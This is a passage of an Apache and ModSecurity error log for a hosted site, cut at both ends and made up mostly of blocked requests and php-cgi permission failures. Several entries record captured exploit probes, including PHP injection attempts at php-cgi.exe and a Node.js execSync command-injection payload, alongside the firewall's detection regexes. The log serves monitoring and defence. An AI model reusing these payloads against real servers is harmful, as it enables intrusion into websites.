.pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/dev-unit.com"] [unique_id "aYltBfSXMvgmn1B8w0tDaAAAAQg"], referer: https://web.dev-unit.com/dev-unit.com/ [Mon Feb 09 07:14:14.500009 2026] [autoindex:error] [pid 24511:tid 24527] [client 74.7.227.165:57230] AH01276: Cannot serve directory /home/id/dev-unit.com/devweb-lastV/public/storage/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://web.dev-unit.com/en/services/web-hosting [Mon Feb 09 07:14:16.790989 2026] [:error] [pid 24511:tid 24516] [client 74.7.227.165:57230] [client 74.7.227.165] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/en/dev-unit.com"] [unique_id "aYltKIia0Ut49JobDF1wuAAAAMM"], referer: https://web.dev-unit.com/en/dev-unit.com/ [Mon Feb 09 07:14:17.201277 2026] [core:error] [pid 24511:tid 24523] [client 74.7.227.165:57230] AH10244: invalid URI path (/dev-style/js/%url%), referer: https://web.dev-unit.com/dev-style/js/jquery.magnific-popup.min.js [Mon Feb 09 16:22:33.781635 2026] [:error] [pid 24313:tid 24425] [client 109.205.211.39:64567] [client 109.205.211.39] ModSecurity: Access denied with code 403 (phase 2). String match "HTTP/1.1" at REQUEST_PROTOCOL. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "399"] [id "960020"] [rev "2"] [msg "Pragma Header requires Cache-Control Header for HTTP/1.1 requests."] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.web.dev-unit.com"] [uri "/wp-login.php"] [unique_id "aYntqYGEjj5WSssDj37COQAAAIg"], referer: https://www.google.com/search?q=wordpress [Mon Feb 09 16:22:34.480082 2026] [:error] [pid 24313:tid 24447] [client 109.205.211.39:64567] [client 109.205.211.39] ModSecurity: Access denied with code 403 (phase 2). String match "HTTP/1.1" at REQUEST_PROTOCOL. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "399"] [id "960020"] [rev "2"] [msg "Pragma Header requires Cache-Control Header for HTTP/1.1 requests."] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.web.dev-unit.com"] [uri "/wp-admin/"] [unique_id "aYntqoGEjj5WSssDj37COwAAAJU"] [Fri Feb 20 00:55:45.118780 2026] [authz_core:error] [pid 26958:tid 26983] [client 167.99.181.249:60436] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Fri Feb 20 00:55:45.905045 2026] [authz_core:error] [pid 26824:tid 26911] [client 146.190.63.48:37486] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Fri Feb 20 00:56:00.863697 2026] [:error] [pid 16295:tid 16319] [client 167.99.181.249:53018] [client 167.99.181.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aZeVAPuECvLkGPJIdZ3CHQAAAQg"] [Fri Feb 20 00:56:03.062929 2026] [:error] [pid 16295:tid 16327] [client 146.190.63.48:60966] [client 146.190.63.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aZeVA_uECvLkGPJIdZ3CIwAAARA"] [Fri Feb 20 00:56:05.012174 2026] [authz_core:error] [pid 27028:tid 27053] [client 142.93.0.66:58528] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Fri Feb 20 00:56:05.180869 2026] [authz_core:error] [pid 26823:tid 26892] [client 143.110.217.244:56702] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Fri Feb 20 00:56:19.766778 2026] [:error] [pid 16295:tid 16326] [client 142.93.0.66:54106] [client 142.93.0.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aZeVE_uECvLkGPJIdZ3CZQAAAQ8"] [Fri Feb 20 00:56:20.222406 2026] [:error] [pid 3353:tid 3389] [client 143.110.217.244:53620] [client 143.110.217.244] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aZeVFJDZwt7qQq8Y6OxGGAAAAUU"] [Sun Feb 22 22:56:00.079039 2026] [:error] [pid 13513:tid 13567] [client 85.11.167.4:43080] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1771793770_7016',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1771793770_701..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aZttYF2nv1IJSwxFn3NcxAAAAFU"], referer: https://web.dev-unit.com [Sun Feb 22 22:56:00.143073 2026] [:error] [pid 13648:tid 13663] [client 85.11.167.4:43090] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1771793770',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1771793770',{'timeo..."] [ve [hostname "web.dev-unit.com"] [uri "/"] [unique_id "aZttYEIvU6Tj2MwTK1PYMwAAAM0"], referer: https://web.dev-unit.com [Fri Feb 27 12:15:32.374770 2026] [:error] [pid 19590:tid 19593] [client 3.139.242.79:51096] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 12:15:32.374887 2026] [:error] [pid 19590:tid 19593] [client 3.139.242.79:51096] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 12:15:32.374901 2026] [core:error] [pid 19590:tid 19593] [client 3.139.242.79:51096] End of script output before headers: index.php [Fri Feb 27 12:16:36.464865 2026] [:error] [pid 19590:tid 19601] [client 3.139.242.79:47737] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 12:16:36.464982 2026] [:error] [pid 19590:tid 19601] [client 3.139.242.79:47737] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 12:16:36.465001 2026] [core:error] [pid 19590:tid 19601] [client 3.139.242.79:47737] End of script output before headers: index.php [Fri Feb 27 17:09:42.115038 2026] [:error] [pid 19590:tid 19610] [client 34.90.69.83:57344] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 17:09:42.115151 2026] [:error] [pid 19590:tid 19610] [client 34.90.69.83:57344] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 17:09:42.115162 2026] [core:error] [pid 19590:tid 19610] [client 34.90.69.83:57344] End of script output before headers: index.php [Fri Feb 27 18:31:25.715671 2026] [:error] [pid 21508:tid 21542] [client 165.245.182.42:65158] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:25.715782 2026] [:error] [pid 21508:tid 21542] [client 165.245.182.42:65158] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:25.715798 2026] [core:error] [pid 21508:tid 21542] [client 165.245.182.42:65158] End of script output before headers: index.php [Fri Feb 27 18:31:26.282024 2026] [:error] [pid 21508:tid 21540] [client 165.245.182.42:65199] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:26.282139 2026] [:error] [pid 21508:tid 21540] [client 165.245.182.42:65199] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:26.282154 2026] [core:error] [pid 21508:tid 21540] [client 165.245.182.42:65199] End of script output before headers: index.php [Fri Feb 27 18:31:26.815610 2026] [:error] [pid 19590:tid 19597] [client 165.245.182.42:65265] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:26.815722 2026] [:error] [pid 19590:tid 19597] [client 165.245.182.42:65265] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:26.815734 2026] [core:error] [pid 19590:tid 19597] [client 165.245.182.42:65265] End of script output before headers: index.php [Fri Feb 27 18:31:27.392237 2026] [:error] [pid 19590:tid 19606] [client 165.245.182.42:65324] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:27.392343 2026] [:error] [pid 19590:tid 19606] [client 165.245.182.42:65324] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:27.392355 2026] [core:error] [pid 19590:tid 19606] [client 165.245.182.42:65324] End of script output before headers: index.php [Fri Feb 27 18:31:27.917468 2026] [:error] [pid 19414:tid 19494] [client 165.245.182.42:65403] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:27.917581 2026] [:error] [pid 19414:tid 19494] [client 165.245.182.42:65403] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:27.917597 2026] [core:error] [pid 19414:tid 19494] [client 165.245.182.42:65403] End of script output before headers: index.php [Fri Feb 27 18:31:28.481903 2026] [:error] [pid 21508:tid 21533] [client 165.245.182.42:65453] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:28.482014 2026] [:error] [pid 21508:tid 21533] [client 165.245.182.42:65453] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:28.482033 2026] [core:error] [pid 21508:tid 21533] [client 165.245.182.42:65453] End of script output before headers: index.php [Fri Feb 27 18:31:29.021418 2026] [:error] [pid 19419:tid 19544] [client 165.245.182.42:65515] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:29.021530 2026] [:error] [pid 19419:tid 19544] [client 165.245.182.42:65515] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:29.021542 2026] [core:error] [pid 19419:tid 19544] [client 165.245.182.42:65515] End of script output before headers: index.php [Fri Feb 27 18:31:29.563346 2026] [:error] [pid 21508:tid 21546] [client 165.245.182.42:49208] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:29.563459 2026] [:error] [pid 21508:tid 21546] [client 165.245.182.42:49208] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:29.563472 2026] [core:error] [pid 21508:tid 21546] [client 165.245.182.42:49208] End of script output before headers: index.php [Fri Feb 27 18:31:30.116720 2026] [:error] [pid 21508:tid 21522] [client 165.245.182.42:49292] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:30.116833 2026] [:error] [pid 21508:tid 21522] [client 165.245.182.42:49292] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:30.116846 2026] [core:error] [pid 21508:tid 21522] [client 165.245.182.42:49292] End of script output before headers: index.php [Fri Feb 27 18:31:30.668812 2026] [:error] [pid 19415:tid 19522] [client 165.245.182.42:49366] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:30.668932 2026] [:error] [pid 19415:tid 19522] [client 165.245.182.42:49366] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:30.668946 2026] [core:error] [pid 19415:tid 19522] [client 165.245.182.42:49366] End of script output before headers: index.php [Fri Feb 27 18:31:31.216626 2026] [:error] [pid 21508:tid 21538] [client 165.245.182.42:49413] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:31.216744 2026] [:error] [pid 21508:tid 21538] [client 165.245.182.42:49413] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:31.216762 2026] [core:error] [pid 21508:tid 21538] [client 165.245.182.42:49413] End of script output before headers: index.php [Fri Feb 27 18:31:31.768249 2026] [:error] [pid 19590:tid 19614] [client 165.245.182.42:49485] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:31.768357 2026] [:error] [pid 19590:tid 19614] [client 165.245.182.42:49485] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:31.768370 2026] [core:error] [pid 19590:tid 19614] [client 165.245.182.42:49485] End of script output before headers: index.php [Fri Feb 27 18:31:32.281515 2026] [:error] [pid 19419:tid 19551] [client 165.245.182.42:49534] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:32.281627 2026] [:error] [pid 19419:tid 19551] [client 165.245.182.42:49534] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:32.281640 2026] [core:error] [pid 19419:tid 19551] [client 165.245.182.42:49534] End of script output before headers: index.php [Fri Feb 27 18:31:32.793375 2026] [:error] [pid 19414:tid 19480] [client 165.245.182.42:49578] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:32.793493 2026] [:error] [pid 19414:tid 19480] [client 165.245.182.42:49578] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:32.793505 2026] [core:error] [pid 19414:tid 19480] [client 165.245.182.42:49578] End of script output before headers: index.php [Fri Feb 27 18:31:33.324794 2026] [:error] [pid 19590:tid 19592] [client 165.245.182.42:49633] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:33.324907 2026] [:error] [pid 19590:tid 19592] [client 165.245.182.42:49633] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:33.324920 2026] [core:error] [pid 19590:tid 19592] [client 165.245.182.42:49633] End of script output before headers: index.php [Fri Feb 27 18:31:33.861953 2026] [:error] [pid 19590:tid 19606] [client 165.245.182.42:49688] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:33.862066 2026] [:error] [pid 19590:tid 19606] [client 165.245.182.42:49688] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:33.862078 2026] [core:error] [pid 19590:tid 19606] [client 165.245.182.42:49688] End of script output before headers: index.php [Fri Feb 27 18:31:34.417047 2026] [:error] [pid 21508:tid 21547] [client 165.245.182.42:49752] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 18:31:34.417156 2026] [:error] [pid 21508:tid 21547] [client 165.245.182.42:49752] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 18:31:34.417168 2026] [core:error] [pid 21508:tid 21547] [client 165.245.182.42:49752] End of script output before headers: index.php [Fri Feb 27 19:03:23.324786 2026] [:error] [pid 19419:tid 19530] [client 91.196.33.183:37038] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 19:03:23.324908 2026] [:error] [pid 19419:tid 19530] [client 91.196.33.183:37038] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 19:03:23.324924 2026] [core:error] [pid 19419:tid 19530] [client 91.196.33.183:37038] End of script output before headers: index.php [Fri Feb 27 22:24:34.290638 2026] [:error] [pid 19590:tid 19599] [client 103.229.153.91:56280] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Fri Feb 27 22:24:34.290751 2026] [:error] [pid 19590:tid 19599] [client 103.229.153.91:56280] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Fri Feb 27 22:24:34.290762 2026] [core:error] [pid 19590:tid 19599] [client 103.229.153.91:56280] End of script output before headers: index.php [Sat Feb 28 01:11:11.000262 2026] [:error] [pid 19590:tid 19612] [client 3.221.83.235:26548] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sat Feb 28 01:11:11.000378 2026] [:error] [pid 19590:tid 19612] [client 3.221.83.235:26548] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sat Feb 28 01:11:11.000393 2026] [core:error] [pid 19590:tid 19612] [client 3.221.83.235:26548] End of script output before headers: index.php [Sat Feb 28 04:31:42.151076 2026] [:error] [pid 12500:tid 12511] [client 199.45.154.138:48242] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sat Feb 28 04:31:42.151192 2026] [:error] [pid 12500:tid 12511] [client 199.45.154.138:48242] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sat Feb 28 04:31:42.151204 2026] [core:error] [pid 12500:tid 12511] [client 199.45.154.138:48242] End of script output before headers: index.php [Sat Feb 28 06:47:16.448073 2026] [:error] [pid 12500:tid 12521] [client 103.229.153.91:48860] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sat Feb 28 06:47:16.448185 2026] [:error] [pid 12500:tid 12521] [client 103.229.153.91:48860] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sat Feb 28 06:47:16.448198 2026] [core:error] [pid 12500:tid 12521] [client 103.229.153.91:48860] End of script output before headers: index.php [Sat Feb 28 09:49:28.780072 2026] [:error] [pid 12406:tid 12420] [client 98.87.115.128:48296] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sat Feb 28 09:49:28.780182 2026] [:error] [pid 12406:tid 12420] [client 98.87.115.128:48296] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sat Feb 28 09:49:28.780194 2026] [core:error] [pid 12406:tid 12420] [client 98.87.115.128:48296] End of script output before headers: index.php [Sat Feb 28 17:16:39.817064 2026] [:error] [pid 12500:tid 12525] [client 74.7.242.47:45938] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sat Feb 28 17:16:39.817178 2026] [:error] [pid 12500:tid 12525] [client 74.7.242.47:45938] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sat Feb 28 17:16:39.817197 2026] [core:error] [pid 12500:tid 12525] [client 74.7.242.47:45938] End of script output before headers: index.php [Sat Feb 28 20:24:03.970014 2026] [:error] [pid 6298:tid 6354] [client 205.210.31.67:63624] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sat Feb 28 20:24:03.970127 2026] [:error] [pid 6298:tid 6354] [client 205.210.31.67:63624] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sat Feb 28 20:24:03.970139 2026] [core:error] [pid 6298:tid 6354] [client 205.210.31.67:63624] End of script output before headers: index.php [Sun Mar 01 04:19:30.354775 2026] [:error] [pid 7725:tid 7757] [client 198.235.24.38:61598] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sun Mar 01 04:19:30.354901 2026] [:error] [pid 7725:tid 7757] [client 198.235.24.38:61598] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sun Mar 01 04:19:30.354918 2026] [core:error] [pid 7725:tid 7757] [client 198.235.24.38:61598] End of script output before headers: index.php [Sun Mar 01 04:42:11.701267 2026] [:error] [pid 7726:tid 7805] [client 81.29.142.100:60672] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sun Mar 01 04:42:11.701382 2026] [:error] [pid 7726:tid 7805] [client 81.29.142.100:60672] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sun Mar 01 04:42:11.701395 2026] [core:error] [pid 7726:tid 7805] [client 81.29.142.100:60672] End of script output before headers: index.php [Sun Mar 01 04:42:17.844904 2026] [:error] [pid 8115:tid 8119] [client 81.29.142.100:60664] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sun Mar 01 04:42:17.845010 2026] [:error] [pid 8115:tid 8119] [client 81.29.142.100:60664] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sun Mar 01 04:42:17.845021 2026] [core:error] [pid 8115:tid 8119] [client 81.29.142.100:60664] End of script output before headers: index.php [Sun Mar 01 11:52:44.724657 2026] [:error] [pid 7725:tid 7776] [client 204.76.203.25:58940] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sun Mar 01 11:52:44.724771 2026] [:error] [pid 7725:tid 7776] [client 204.76.203.25:58940] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sun Mar 01 11:52:44.724785 2026] 